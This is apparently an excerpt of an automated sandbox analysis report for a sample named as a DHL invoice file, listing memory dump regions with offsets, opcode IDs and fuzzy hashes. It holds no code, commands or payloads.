                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 54d77441b1596785e8b42456763a7a869548cadb39f373cd91c2c00fe2153eab
                                                                                                                • Instruction ID: 2c9f45370e689949e36cb83ad23f40f4fedc86f5b603e167b5d6de1d5e8c4a5f
                                                                                                                • Opcode Fuzzy Hash: 54d77441b1596785e8b42456763a7a869548cadb39f373cd91c2c00fe2153eab
                                                                                                                • Instruction Fuzzy Hash: DAD05E357504108FC700D639E841F9A7BA59F89214B1582AAE009DB721C9679C038BD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 220cf9b818842323697a51507a7f886b60c42bd66a467ff5da741c91684ba605
                                                                                                                • Instruction ID: e51700488d30160817a5175c24281e57145462537a8f2ab3beb5b788305aedb7
                                                                                                                • Opcode Fuzzy Hash: 220cf9b818842323697a51507a7f886b60c42bd66a467ff5da741c91684ba605
                                                                                                                • Instruction Fuzzy Hash: 0DF0F274A05318CFDB60DF98D488B9DBBB2FB09304F2404AAE018B3651DBB0AE81CF11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d1b2b60fe21dddb082accb7df92bebf266a1d7812c8c54886f32bf6312728f2
                                                                                                                • Instruction ID: 84f79b47bc88dc64d120cd41a5215534510e8a0041e22d61e6fd373d4cb0f241
                                                                                                                • Opcode Fuzzy Hash: 2d1b2b60fe21dddb082accb7df92bebf266a1d7812c8c54886f32bf6312728f2
                                                                                                                • Instruction Fuzzy Hash: 2BE0B675604A059F8358CF5EE440C52FBE9EF8D724315827EE54DC7B21EA31E806CB64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 19c64a77d8da65b663478d7546db0d7bd81e718b7a33611eab0e4a8408521fe1
                                                                                                                • Instruction ID: 1be0f3727fc08cf579aae3ee4b6fe768cfa5e876ad24953ca50c6c1613e01b67
                                                                                                                • Opcode Fuzzy Hash: 19c64a77d8da65b663478d7546db0d7bd81e718b7a33611eab0e4a8408521fe1
                                                                                                                • Instruction Fuzzy Hash: E7E01A78E18108AFC744DF98D4506ACFBB4AB48200F2080A9AC085B341DA35AA41DB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 498b7f9bffadd388f5ef753d0f05b4f70d917071cfcb526207aa952152d7f4b1
                                                                                                                • Instruction ID: a706d647464a6e218ec3f81f89af3c1f3354af09537becd84f903fde5193b9e7
                                                                                                                • Opcode Fuzzy Hash: 498b7f9bffadd388f5ef753d0f05b4f70d917071cfcb526207aa952152d7f4b1
                                                                                                                • Instruction Fuzzy Hash: 48E04F70908108DFD780DFE8D48069CBBF4AB0A300F2084ADDC08D3340DA319A81DB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d19a31c0386a82bf2d84561c6d543c06dcbf6fe820fa316415d9bca769fb4a12
                                                                                                                • Instruction ID: 44f725d0b839a31a3704e80be584563164e5008d41c19a8d9ef45b7f08272c7c
                                                                                                                • Opcode Fuzzy Hash: d19a31c0386a82bf2d84561c6d543c06dcbf6fe820fa316415d9bca769fb4a12
                                                                                                                • Instruction Fuzzy Hash: 6FD05B31344374ABDB34A6654D05B623399BF09B51F600C79D6475F285DD72E881C771
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
                                                                                                                • Instruction ID: 85c44ac6eab49e014bfe99700c4443671a45057599e341a9c0364180fac77636
                                                                                                                • Opcode Fuzzy Hash: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
                                                                                                                • Instruction Fuzzy Hash: 50E0867490C108EBCB04DF94E8449ADFB75EB45310F20D09DEC4427351C731AE91DB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ee080e768d8b4f97dd5681ed6ce3e54545ebefafbc7771d23d722b94b53e3f4
                                                                                                                • Instruction ID: 75bb9f95701243130071fc3b27859bc37aa7e3c83df8d8f413d7daff08ec4f9c
                                                                                                                • Opcode Fuzzy Hash: 0ee080e768d8b4f97dd5681ed6ce3e54545ebefafbc7771d23d722b94b53e3f4
                                                                                                                • Instruction Fuzzy Hash: 6BE08C3A7000989F8F00DF68E4551EDBBA9FB89221B508069F955C3201CB30A91ACBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
                                                                                                                • Instruction ID: 5772b224652483759702f8a260a431e4badffdb47347e5e01014a2468225d4ab
                                                                                                                • Opcode Fuzzy Hash: 9a530dec78bd052316d663f0fac7f70b3129e089677a10c6fcdbddcfd62d9236
                                                                                                                • Instruction Fuzzy Hash: EDE0867490C108EBC714DF94D8449ACFB75EB45315F20D099EC0463351C6719E51DB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
                                                                                                                • Instruction ID: 5eba5bbb3be4360e1999eb1ab618ef16828005254eba44f54fbfe8ca56ffce83
                                                                                                                • Opcode Fuzzy Hash: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
                                                                                                                • Instruction Fuzzy Hash: 3FE08C34A18208EBC748EF98E9815ACBBB8EB85301F2090989C0913342CB31AE42DB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
                                                                                                                • Instruction ID: 968cf41d6c21517596ed3cb72f2550c8f0a7f84f3525b4688217fde5035110c3
                                                                                                                • Opcode Fuzzy Hash: 1deb9260a81ff4fbb2f99f59a4dd3b6068ce5e21db8db808d516cf7c7debbd79
                                                                                                                • Instruction Fuzzy Hash: AFE0EC74919108DBC748EF94E985AACBBB8AB45314F209599AC0817351CA71AE52DB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea709b1a9dad1fe81fdba13750c0071debcc744e3b8685ae511df29b1f3c28e0
                                                                                                                • Instruction ID: 2b7d456c338997677ed5f98527dbbc26601e1e360977d8225e335e31667d8c95
                                                                                                                • Opcode Fuzzy Hash: ea709b1a9dad1fe81fdba13750c0071debcc744e3b8685ae511df29b1f3c28e0
                                                                                                                • Instruction Fuzzy Hash: ADE0EC74D1920CDFCB50EFF8D44569DBFB8AB05201F6055A9AC09D3350EA306A54DB55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 11d4b8febeddfa8fb94b19c0cf26763afb0348a70436955f9a7253de24f52e17
                                                                                                                • Instruction ID: 5783563ea7564189143676fdaecddce6eee09f74dfbe3f3539bf769af7cc8234
                                                                                                                • Opcode Fuzzy Hash: 11d4b8febeddfa8fb94b19c0cf26763afb0348a70436955f9a7253de24f52e17
                                                                                                                • Instruction Fuzzy Hash: D5E092B4E09208EFCB54DFA8E54469DBBB5EB48301F2085AAE808A3350D7759A54DF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b22717b19d068834d7b70cb71130a4656e0959ea854a24e4c4a04eefeb043463
                                                                                                                • Instruction ID: 9e63902619c8fd6ae790b673150afcd470ce2eb5e30e64107b3a16edc27eba8b
                                                                                                                • Opcode Fuzzy Hash: b22717b19d068834d7b70cb71130a4656e0959ea854a24e4c4a04eefeb043463
                                                                                                                • Instruction Fuzzy Hash: EEF05FB4D586288FDB68CF15DC8878ABBB2BB88301F1042DAD449A3750E7755E90DF05
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8299e801e5f84622761180380a64452071d9971fe7562518c9d937c38f20d0c1
                                                                                                                • Instruction ID: 0e7b70ef2b286a2e073f2596a6301b95a5372aea8909b44d682a8f2ea9dbac46
                                                                                                                • Opcode Fuzzy Hash: 8299e801e5f84622761180380a64452071d9971fe7562518c9d937c38f20d0c1
                                                                                                                • Instruction Fuzzy Hash: 57E09A70809658CBDB508F148C88A9C3BB0FF12300F0460EACC4AAB382C73001858F45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2065ac06dc1d34a60633e4b07a58129a5cc4f392ab92812465e94e80a7cd492f
                                                                                                                • Instruction ID: d9f899ec85cbdd8e9cb4e0be5b7b25ded43ccbec9e5cb211b8e4744687606177
                                                                                                                • Opcode Fuzzy Hash: 2065ac06dc1d34a60633e4b07a58129a5cc4f392ab92812465e94e80a7cd492f
                                                                                                                • Instruction Fuzzy Hash: 44E01271A40308EFCB00DFB4D941BADBBBAEB85300F5085E8E9099B344DE316F05AB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f8bd438b224deab07a8fa8ca170ceac4dc2f2b789592708b6520043650a28278
                                                                                                                • Instruction ID: fa81fb454de47bf48e731e5c28cd887a9f014a13960b25e0666b5b5f3474ed74
                                                                                                                • Opcode Fuzzy Hash: f8bd438b224deab07a8fa8ca170ceac4dc2f2b789592708b6520043650a28278
                                                                                                                • Instruction Fuzzy Hash: 93E0EC70915208DFCB54EFB8954529CBBB4AB04305F2044A9E80892350E7319A84DB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d21066e69624ca9e91d0a27e13cea3613aa86a1b7e09d596582c3352c43529d
                                                                                                                • Instruction ID: a36135dfb0b968101ebdeeb1178a9f93567daf7d09200d2e8f76d4badb9cfa9c
                                                                                                                • Opcode Fuzzy Hash: 6d21066e69624ca9e91d0a27e13cea3613aa86a1b7e09d596582c3352c43529d
                                                                                                                • Instruction Fuzzy Hash: C9E075749142288FCF68DF29D8986E877F0FF59305F0490DAC94AA7345DB315A85DF84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2e5f13bce82dbc5fe267dc99377557bd492601a5e605603a3cefadf5e4881fb2
                                                                                                                • Instruction ID: 12368bdf31d000d6f5e63d7604e745dc7ba263025886c39dd7d7e67e8aa0eafa
                                                                                                                • Opcode Fuzzy Hash: 2e5f13bce82dbc5fe267dc99377557bd492601a5e605603a3cefadf5e4881fb2
                                                                                                                • Instruction Fuzzy Hash: 12E01271A00209EFCB00EFA4D94169DB7F9EB45300F1081A8E408D7305DE316F05AB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 78b7e4fc3652f95827661fe846c23b65a3c3de3b0e6aba121890be5b37d28843
                                                                                                                • Instruction ID: 37cb501196b69666ef556b50315fa8be31b06e61f512796b69d28baf9dbb0ebb
                                                                                                                • Opcode Fuzzy Hash: 78b7e4fc3652f95827661fe846c23b65a3c3de3b0e6aba121890be5b37d28843
                                                                                                                • Instruction Fuzzy Hash: DAE0B674E003298ACB54CF21CC44BA8B7B2FB8A305F0480EB800B76A50DB301A85CF42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9da3eae5fb9577a3a74cd0e0015d08ea7bdcb3934df29cbb0a2db27fdb012fb0
                                                                                                                • Instruction ID: 0d54e9cc64f20ae4e7642ef97bb4bd081b5a5c3ded9d09ccd6f8908b5979485d
                                                                                                                • Opcode Fuzzy Hash: 9da3eae5fb9577a3a74cd0e0015d08ea7bdcb3934df29cbb0a2db27fdb012fb0
                                                                                                                • Instruction Fuzzy Hash: 7FE0E2748012288BCB66CF60C950A9DB7BAAB16204F1001D8990873281C7315FC1CF14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 56cb896daac9582c2923ec3fb2d0d9f2f1ccf32d39f4deadfc1f76c8dee91fdf
                                                                                                                • Instruction ID: 2fcf6402705f6529af500a7d3c8257c48e10ec3288f4a75a2f51774ff27545c8
                                                                                                                • Opcode Fuzzy Hash: 56cb896daac9582c2923ec3fb2d0d9f2f1ccf32d39f4deadfc1f76c8dee91fdf
                                                                                                                • Instruction Fuzzy Hash: 6AD0C97A005244AFD3029B64D804D857F78EB16225B1980E2E5488B273E6219814CB65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 09447eb816d4fcb413569c292b9c40cd8e5ea9657c7701432984bcbbd8ea7a49
                                                                                                                • Instruction ID: 7b4670b9cd7aee8aa6859343520833eb297855c9a26e6dd962a8a9a11b2c8686
                                                                                                                • Opcode Fuzzy Hash: 09447eb816d4fcb413569c292b9c40cd8e5ea9657c7701432984bcbbd8ea7a49
                                                                                                                • Instruction Fuzzy Hash: 07D06C7090A299CAEB60CF248898B9D7BB0AF16314F1951E9984AA7381CB3059848F46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dc7a773c5348dd15cab4d10e7d045603ea6fe53efec9398012f6464247eae286
                                                                                                                • Instruction ID: 942fa7b1e2fabbd30cd492d9a27e79618d6e35d811643b39630d92c23004b521
                                                                                                                • Opcode Fuzzy Hash: dc7a773c5348dd15cab4d10e7d045603ea6fe53efec9398012f6464247eae286
                                                                                                                • Instruction Fuzzy Hash: 5ED06C78904318CFDB10DF50E888B9ABBB2BB4A304F104496D809A7724D7705A849F01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3b83102c109297bf53b61059f5ddbcbc7a328b321a285506c5e44648ad46c96f
                                                                                                                • Instruction ID: b7835cd4a668593a1cb431779f95c1cd2924e90e510314c94094a8468af87ff1
                                                                                                                • Opcode Fuzzy Hash: 3b83102c109297bf53b61059f5ddbcbc7a328b321a285506c5e44648ad46c96f
                                                                                                                • Instruction Fuzzy Hash: ACC0480450E3C19FD71396702D620982FF01C83600BAF48EB89C19A6A7E00D581EC322
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 321d6abed9b18a672aa21bd1558076bd5722b7a291d00fbec2d7c8831c6a19ee
                                                                                                                • Instruction ID: 112c4de9863e50ba432e4b15bcbdd62bcf9c89a70246ac610603d3d756d57c98
                                                                                                                • Opcode Fuzzy Hash: 321d6abed9b18a672aa21bd1558076bd5722b7a291d00fbec2d7c8831c6a19ee
                                                                                                                • Instruction Fuzzy Hash: CDD0C93144410ADBEB20DB50C51BBEEBAB0BB44306F200416C401B1196C7750E88DB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c8c19bb33daf26b7cb0a94c7a68835015796c68dd77e3397acd68f955582c8f5
                                                                                                                • Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
                                                                                                                • Opcode Fuzzy Hash: c8c19bb33daf26b7cb0a94c7a68835015796c68dd77e3397acd68f955582c8f5
                                                                                                                • Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8f06f6c2fed99283ecdbe9f1af27fd5e5fd02de61f85618c63f1d1edf335c1ec
                                                                                                                • Instruction ID: fd2ceed314a778eb235838eda3a364257324cfa16e6ea35c026f899df66a3dea
                                                                                                                • Opcode Fuzzy Hash: 8f06f6c2fed99283ecdbe9f1af27fd5e5fd02de61f85618c63f1d1edf335c1ec
                                                                                                                • Instruction Fuzzy Hash: A9D06CB8908229CBDB20CF20D945BD8B7B2AB49310F0082DA880EA2610D3705EC18F00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d66b9367f5f2320a974e1e13346f2c6ed4f817073271645bd28899f67d0badf
                                                                                                                • Instruction ID: bb9d7566b79ef4d6f240a0075926a28453590295d6a5dbc1ff4cac6f7ac7ef4d
                                                                                                                • Opcode Fuzzy Hash: 7d66b9367f5f2320a974e1e13346f2c6ed4f817073271645bd28899f67d0badf
                                                                                                                • Instruction Fuzzy Hash: D9A00138790304AFEE2556509A1BF887A24A761B42F560480B6D5A92D2ABD13482CA59
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: TJcq$Te^q$xbaq
                                                                                                                • API String ID: 0-3225726259
                                                                                                                • Opcode ID: e2f2384db20732d2edcfe9228987855e514b8b16673678551ce715250506b1d2
                                                                                                                • Instruction ID: 9764a8cadbce46eb644ff4c6fd75f760c0725d7cf121daa5e9502b24f693804e
                                                                                                                • Opcode Fuzzy Hash: e2f2384db20732d2edcfe9228987855e514b8b16673678551ce715250506b1d2
                                                                                                                • Instruction Fuzzy Hash: D3B15975E016188FDB58DF6AC984ADDBBF2BF89300F14C1A9D909AB365DB305A81CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (bq$,bq
                                                                                                                • API String ID: 0-1616511919
